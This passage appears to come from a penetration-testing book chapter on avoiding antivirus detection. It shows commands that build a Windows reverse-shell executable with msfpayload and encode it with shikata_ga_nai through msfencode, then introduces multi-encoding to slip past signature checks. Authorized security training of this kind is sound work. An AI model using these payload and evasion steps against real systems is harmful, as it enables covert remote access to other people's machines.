Avoiding Detection
103
Now we’ll run a simple encoding of an MSF payload by importing raw
output from
msfpayload
into
msfencode
to see how the result affects our anti-
virus detection:
root@bt:/#
msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=31337 R |
msfencode -e x86/shikata_ga_nai -t exe > /var/www/payload2.exe
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=1)
root@bt:/#
file /var/www/payload2.exe
/var/www/2.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
We add the
R
flag at to the
msfpayload
command line to specify raw
output, because we will pipe its output directly into
msfencode
. We specify the
x86/shikata_ga_nai
encoder at and tell
msfencode
to send the executable out-
put
-t exe
to
/var/www/payload2.exe
. Finally, we run a quick check at to
ensure that the resulting file is in fact a Windows executable. The response
tells us that it is. Unfortunately, after the
payload2.exe
file is copied over to the
Windows system, AVG detects our encoded payload yet again, as shown in
Figure 7-2.
Figure 7-2: AVG detected our encoded payload.
Multi-encoding
When we’re performing antivirus detection without modifying the static
binary itself, it’s always a cat-and-mouse game, because antivirus signatures
are frequently updated to detect new and changed payloads. Within the
Framework, we can get better results through
multi-encoding
, which allows
the payload to be encoded several times to throw off antivirus programs that
check for signatures.
In the preceding example, the
shikata_ga_nai
encoding is
polymorphic
,
meaning that the payload will change each time the script is run. Of course,
the payload that an antivirus product will flag is a mystery: Every time you
generate a payload, the same antivirus program can flag it once and miss it
another time.